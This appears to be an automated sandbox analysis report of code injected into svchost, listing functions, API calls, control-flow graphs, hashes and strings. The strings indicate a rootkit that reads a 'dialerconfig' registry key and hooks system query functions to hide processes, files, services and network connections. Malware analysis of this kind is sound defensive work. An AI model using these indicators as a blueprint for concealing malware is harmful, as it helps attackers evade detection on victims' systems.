RegCloseKey 14818->14819 14820 14e25ed10bf 14818->14820 14819->14775 14820->14819 14821 14e25ed10cf RegEnumValueW 14820->14821 14822 14e25ed114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14820->14822 14821->14820 14822->14820 14824 14e25ed1546 14823->14824 14827 14e25ed157c 14823->14827 14825 14e25ed155d StrCmpIW 14824->14825 14826 14e25ed1565 StrCmpW 14824->14826 14824->14827 14825->14824 14826->14824 14827->14814 14828 14e255d273c 14830 14e255d276a 14828->14830 14829 14e255d2858 LoadLibraryA 14829->14830 14830->14829 14831 14e255d28d4 14830->14831

                                                        Executed Functions

                                                        Function 0000014E25ED328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: ec4161c4f1973986df8c574484aa40d597b44ab65623eef5f4e9b84d014c0903
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 45116DB1A3264082FBE49B25FF05FD922DCB79A345F5061249917855F6EFF9C1448350
                                                        Function 0000014E25ED1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0000014E25ED1628: GetProcessHeap.KERNEL32 ref: 0000014E25ED1633
                                                          • Part of subcall function 0000014E25ED1628: HeapAlloc.KERNEL32 ref: 0000014E25ED1642
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED16B2
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED16DF
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED16F9
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1719
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1734
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1754
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED176F
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED178F
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED17AA
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED17CA
                                                        • Sleep.KERNEL32 ref: 0000014E25ED1AD7
                                                        • SleepEx.KERNELBASE ref: 0000014E25ED1ADD
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED17E5
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1805
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1820
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1840
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED185B
                                                          • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED187B
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1896
                                                          • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED18A0
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 4f9138a27f515c4560b724a4ce78d8a5789e6dff9fc277979641b626aa87eaa8
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 4031BD7221264181EBD89B26DF51BE913EDBB8DBD4F0474219E0B876B6EE94C8518311
                                                        Function 0000014E25ED3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 57 14e25ed3844-14e25ed384f 58 14e25ed3869-14e25ed3870 57->58 59 14e25ed3851-14e25ed3864 StrCmpNIW 57->59 59->58 60 14e25ed3866 59->60 60->58
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 70b5d17667e6c287c63a42a861956bd54ed603b9f6973ac1a3c59364d2fced0b
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 8DD0A77433220586FF94DFE6AEC4EE423DCFB08764F985024CD02012B0DB988D8D9710
                                                        Function 0000014E255D273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 61d15e7f8051c1c6ea22e4ab23ff41feee112f27c0d23cc355fd173832c7c0b5
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: F7615633F4229187DB54CF15CA40BADB3DAF755BA4F988121CE5A03798DA78D892C700

                                                        Non-executed Functions

                                                        Function 0000014E25ED2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 355 14e25ed2b2c-14e25ed2ba5 call 14e25ef2ce0 358 14e25ed2bab-14e25ed2bb1 355->358 359 14e25ed2ee0-14e25ed2f03 355->359 358->359 360 14e25ed2bb7-14e25ed2bba 358->360 360->359 361 14e25ed2bc0-14e25ed2bc3 360->361 361->359 362 14e25ed2bc9-14e25ed2bd9 GetModuleHandleA 361->362 363 14e25ed2bdb-14e25ed2beb GetProcAddress 362->363 364 14e25ed2bed 362->364 365 14e25ed2bf0-14e25ed2c0e 363->365 364->365 365->359 367 14e25ed2c14-14e25ed2c33 StrCmpNIW 365->367 367->359 368 14e25ed2c39-14e25ed2c3d 367->368 368->359 369 14e25ed2c43-14e25ed2c4d 368->369 369->359 370 14e25ed2c53-14e25ed2c5a 369->370 370->359 371 14e25ed2c60-14e25ed2c73 370->371 372 14e25ed2c83 371->372 373 14e25ed2c75-14e25ed2c81 371->373 374 14e25ed2c86-14e25ed2c8a 372->374 373->374 375 14e25ed2c9a 374->375 376 14e25ed2c8c-14e25ed2c98 374->376 377 14e25ed2c9d-14e25ed2ca7 375->377 376->377 378 14e25ed2d9d-14e25ed2da1 377->378 379 14e25ed2cad-14e25ed2cb0 377->379 380 14e25ed2da7-14e25ed2daa 378->380 381 14e25ed2ed2-14e25ed2eda 378->381 382 14e25ed2cc2-14e25ed2ccc 379->382 383 14e25ed2cb2-14e25ed2cbf call 14e25ed199c 379->383 387 14e25ed2dbb-14e25ed2dc5 380->387 388 14e25ed2dac-14e25ed2db8 call 14e25ed199c 380->388 381->359 381->371 385 14e25ed2cce-14e25ed2cdb 382->385 386 14e25ed2d00-14e25ed2d0a 382->386 383->382 385->386 390 14e25ed2cdd-14e25ed2cea 385->390 391 14e25ed2d3a-14e25ed2d3d 386->391 392 14e25ed2d0c-14e25ed2d19 386->392 394 14e25ed2dc7-14e25ed2dd4 387->394 395 14e25ed2df5-14e25ed2df8 387->395 388->387 399 14e25ed2ced-14e25ed2cf3 390->399 401 14e25ed2d4b-14e25ed2d58 lstrlenW 391->401 402 14e25ed2d3f-14e25ed2d49 call 14e25ed1bbc 391->402 392->391 400 14e25ed2d1b-14e25ed2d28 392->400 394->395 396 14e25ed2dd6-14e25ed2de3 394->396 397 14e25ed2dfa-14e25ed2e03 call 14e25ed1bbc 395->397 398 14e25ed2e05-14e25ed2e12 lstrlenW 395->398 404 14e25ed2de6-14e25ed2dec 396->404 397->398 414 14e25ed2e4a-14e25ed2e55 397->414 410 14e25ed2e35-14e25ed2e3f call 14e25ed3844 398->410 411 14e25ed2e14-14e25ed2e1e 398->411 408 14e25ed2cf9-14e25ed2cfe 399->408 409 14e25ed2d93-14e25ed2d98 399->409 412 14e25ed2d2b-14e25ed2d31 400->412 405 14e25ed2d7b-14e25ed2d8d call 14e25ed3844 401->405 406 14e25ed2d5a-14e25ed2d64 401->406 402->401 402->409 404->414 415 14e25ed2dee-14e25ed2df3 404->415 405->409 419 14e25ed2e42-14e25ed2e44 405->419 406->405 416 14e25ed2d66-14e25ed2d79 call 14e25ed152c 406->416 408->386 408->399 409->419 410->419 411->410 420 14e25ed2e20-14e25ed2e33 call 14e25ed152c 411->420 412->409 421 14e25ed2d33-14e25ed2d38 412->421 424 14e25ed2ecc-14e25ed2ed0 414->424 425 14e25ed2e57-14e25ed2e5b 414->425 415->395 415->404 416->405 416->409 419->381 419->414 420->410 420->414 421->391 421->412 424->381 430 14e25ed2e5d-14e25ed2e61 425->430 431 14e25ed2e63-14e25ed2e7d call 14e25ed85c0 425->431 430->431 434 14e25ed2e80-14e25ed2e83 430->434 431->434 437 14e25ed2ea6-14e25ed2ea9 434->437 438 14e25ed2e85-14e25ed2ea3 call 14e25ed85c0 434->438 437->424 440 14e25ed2eab-14e25ed2ec9 call 14e25ed85c0 437->440 438->437 440->424
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 5f587f22587abd1431a1499f71e10d14118b5f21938d0c7cdf4f0e995d43f0cd
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 5AB1AD72222A5086EBE98F25DE40BE963EDFB46B94F046016EE0A577B4DFB5CC40C340
                                                        Function 0000014E25ED7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: a58b129de63e11622298d6c6a6695538686e417bbbb43f62ee147bc6e5dcd9c5
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: C5318272215B808AEBA09F60F840BED73B8F785754F54502ADB4E47BA9EF78C548C710
                                                        Function 0000014E25EDD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 15f96c7993330800901423ecee5f9673b24142775bcc2ce8a9715945b3205e8b
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 12318072215F8086DBA0CF25E940BDE73E8F78A764F541126EA9E43BA9DF78C545CB00
                                                        Function 0000014E25ED1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: c1bc9262416f542b9bcf67935fbe76358c1d3776086d0358d464ba4c20ede195
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 32713A76721A1086EBA09F61EA80ADD23EDFB89B98F002115DE4F47B39DFB8C544C340
                                                        Function 0000014E25ED12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 7a8f22d71641694a9fd7ec0762583f57e8a0a7c965321d3c74b055877a6cee4e
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: F0516C72211B8486EB95CF62FA487AA77E9F389BE9F144124DA4A0772ADF7CC045C700
                                                        Function 0000014E25ED1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 8747b8a499e9052df40478483ed6c278368860711bb81c5df639d3b7e26418f2
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 7031067462295AA0EB84EF65EF51FD863EEBB05358FD06017940B12176AFF8C249C390
                                                        Function 0000014E255D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 201 14e255d6910-14e255d6916 202 14e255d6918-14e255d691b 201->202 203 14e255d6951-14e255d695b 201->203 205 14e255d691d-14e255d6920 202->205 206 14e255d6945-14e255d6984 call 14e255d6fc0 202->206 204 14e255d6a78-14e255d6a8d 203->204 210 14e255d6a9c-14e255d6ab6 call 14e255d6e54 204->210 211 14e255d6a8f 204->211 208 14e255d6938 __scrt_dllmain_crt_thread_attach 205->208 209 14e255d6922-14e255d6925 205->209 223 14e255d698a-14e255d699f call 14e255d6e54 206->223 224 14e255d6a52 206->224 212 14e255d693d-14e255d6944 208->212 214 14e255d6927-14e255d6930 209->214 215 14e255d6931-14e255d6936 call 14e255d6f04 209->215 221 14e255d6ab8-14e255d6aed call 14e255d6f7c call 14e255d6e1c call 14e255d7318 call 14e255d7130 call 14e255d7154 call 14e255d6fac 210->221 222 14e255d6aef-14e255d6b20 call 14e255d7190 210->222 216 14e255d6a91-14e255d6a9b 211->216 215->212 221->216 233 14e255d6b22-14e255d6b28 222->233 234 14e255d6b31-14e255d6b37 222->234 236 14e255d6a6a-14e255d6a77 call 14e255d7190 223->236 237 14e255d69a5-14e255d69b6 call 14e255d6ec4 223->237 227 14e255d6a54-14e255d6a69 224->227 233->234 238 14e255d6b2a-14e255d6b2c 233->238 239 14e255d6b39-14e255d6b43 234->239 240 14e255d6b7e-14e255d6b94 call 14e255d268c 234->240 236->204 254 14e255d6a07-14e255d6a11 call 14e255d7130 237->254 255 14e255d69b8-14e255d69dc call 14e255d72dc call 14e255d6e0c call 14e255d6e38 call 14e255dac0c 237->255 244 14e255d6c1f-14e255d6c2c 238->244 245 14e255d6b45-14e255d6b4d 239->245 246 14e255d6b4f-14e255d6b5d call 14e255e5780 239->246 262 14e255d6bcc-14e255d6bce 240->262 263 14e255d6b96-14e255d6b98 240->263 251 14e255d6b63-14e255d6b78 call 14e255d6910 245->251 246->251 266 14e255d6c15-14e255d6c1d 246->266 251->240 251->266 254->224 276 14e255d6a13-14e255d6a1f call 14e255d7180 254->276 255->254 304 14e255d69de-14e255d69e5 __scrt_dllmain_after_initialize_c 255->304 264 14e255d6bd5-14e255d6bea call 14e255d6910 262->264 265 14e255d6bd0-14e255d6bd3 262->265 263->262 271 14e255d6b9a-14e255d6bbc call 14e255d268c call 14e255d6a78 263->271 264->266 285 14e255d6bec-14e255d6bf6 264->285 265->264 265->266 266->244 271->262 297 14e255d6bbe-14e255d6bc6 call 14e255e5780 271->297 293 14e255d6a45-14e255d6a50 276->293 294 14e255d6a21-14e255d6a2b call 14e255d7098 276->294 290 14e255d6bf8-14e255d6bff 285->290 291 14e255d6c01-14e255d6c11 call 14e255e5780 285->291 290->266 291->266 293->227 294->293 303 14e255d6a2d-14e255d6a3b 294->303 297->262 303->293 304->254 305 14e255d69e7-14e255d6a04 call 14e255dabc8 304->305 305->254
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 2332f7615c00a9b45a6cd8c5de408ca84be1c3b81a06dd6493736303431c435b
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 9681D333E8264386FA509B659E41BD963DDFB87780F6880159A4B877B6DBFCC8478700
                                                        Function 0000014E25EDCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 308 14e25edce28-14e25edce4a GetLastError 309 14e25edce4c-14e25edce57 FlsGetValue 308->309 310 14e25edce69-14e25edce74 FlsSetValue 308->310 311 14e25edce59-14e25edce61 309->311 312 14e25edce63 309->312 313 14e25edce7b-14e25edce80 310->313 314 14e25edce76-14e25edce79 310->314 315 14e25edced5-14e25edcee0 SetLastError 311->315 312->310 316 14e25edce85 call 14e25edd6cc 313->316 314->315 317 14e25edcee2-14e25edcef4 315->317 318 14e25edcef5-14e25edcf0b call 14e25edc748 315->318 319 14e25edce8a-14e25edce96 316->319 332 14e25edcf0d-14e25edcf18 FlsGetValue 318->332 333 14e25edcf28-14e25edcf33 FlsSetValue 318->333 321 14e25edcea8-14e25edceb2 FlsSetValue 319->321 322 14e25edce98-14e25edce9f FlsSetValue 319->322 325 14e25edcec6-14e25edced0 call 14e25edcb94 call 14e25edd744 321->325 326 14e25edceb4-14e25edcec4 FlsSetValue 321->326 324 14e25edcea1-14e25edcea6 call 14e25edd744 322->324 324->314 325->315 326->324 334 14e25edcf1a-14e25edcf1e 332->334 335 14e25edcf22 332->335 337 14e25edcf98-14e25edcf9f call 14e25edc748 333->337 338 14e25edcf35-14e25edcf3a 333->338 334->337 339 14e25edcf20 334->339 335->333 340 14e25edcf3f call 14e25edd6cc 338->340 342 14e25edcf8f-14e25edcf97 339->342 343 14e25edcf44-14e25edcf50 340->343 345 14e25edcf62-14e25edcf6c FlsSetValue 343->345 346 14e25edcf52-14e25edcf59 FlsSetValue 343->346 347 14e25edcf6e-14e25edcf7e FlsSetValue 345->347 348 14e25edcf80-14e25edcf88 call 14e25edcb94 345->348 349 14e25edcf5b-14e25edcf60 call 14e25edd744 346->349 347->349 348->342 354 14e25edcf8a call 14e25edd744 348->354 349->337 354->342
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 0000014E25EDCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCEBC
                                                        • SetLastError.KERNEL32 ref: 0000014E25EDCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,0000014E25EDECCC,?,?,?,?,0000014E25EDBF9F,?,?,?,?,?,0000014E25ED7AB0), ref: 0000014E25EDCF2C
                                                          • Part of subcall function 0000014E25EDD6CC: HeapAlloc.KERNEL32 ref: 0000014E25EDD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF54
                                                          • Part of subcall function 0000014E25EDD744: HeapFree.KERNEL32 ref: 0000014E25EDD75A
                                                          • Part of subcall function 0000014E25EDD744: GetLastError.KERNEL32 ref: 0000014E25EDD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF76
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 0e38215d1457e59afe65eb01ec79511c82aee5c2ce1e14f3d06b2e4fe1cd1a9d
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 69416F7025324485FAE9A7359F51BF962CEBB877F0F142B24A83B466F6DEE984014341
                                                        Function 0000014E25ED2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: f3f1b66307ed9429f7177bedba5dbcb25a8199bf3a3daf748d0c8febe8376095
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 5321307262475082EB50CB25FA4479963E8F7897A4F500215DA5A02BB9CFBCC549CB00
                                                        Function 0000014E255D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
